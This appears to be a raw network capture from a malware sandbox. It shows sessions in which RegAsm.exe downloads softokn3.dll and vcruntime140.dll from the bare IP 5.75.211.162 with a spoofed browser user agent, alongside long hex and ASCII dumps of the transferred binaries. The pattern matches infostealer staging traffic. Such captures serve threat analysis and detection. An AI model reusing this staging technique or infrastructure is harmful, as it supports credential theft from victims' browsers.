2024-09-26 22:28:48 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	57891	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:49 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:49 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:49 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:28:49 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:28:49 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-26 22:28:49 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-26 22:28:50 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	57892	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:50 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:51 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:51 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:28:51 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:28:51 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-26 22:28:51 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-26 22:28:51 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-26 22:28:51 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
